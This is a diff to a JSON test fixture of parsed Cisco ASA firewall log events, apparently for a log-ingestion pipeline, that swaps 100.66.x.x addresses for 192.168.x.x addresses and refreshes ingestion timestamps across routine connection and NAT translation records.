@@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721863100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:34:28.099963500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721867300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:34:28.099969400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721872100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:34:28.099990900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, 
@@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721876700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099994700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721881200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:34:28.099999200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721886100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:34:28.100004200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721891700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:34:28.100009100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721896700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:34:28.100014700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721901600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:34:28.100018900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721906Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100023Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721910400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.100026500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721914400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:34:28.100030800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" 
@@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721918400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:34:28.100036400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-09-07T12:21:32.721922400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:34:28.100042Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", 
@@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721926800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100047800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721931100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100053400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" 
@@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721935300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100059Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721941300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:34:28.100064500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721946500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100070100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, 
@@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721951Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:34:28.100075600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721955200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:34:28.100102900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, 
@@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721959500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100109Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721963800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:34:28.100114900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721968100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:34:28.100120800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721972300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:34:28.100126600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721976700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100131800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, 
@@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721985Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:34:28.100136700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721989700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:34:28.100158500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + 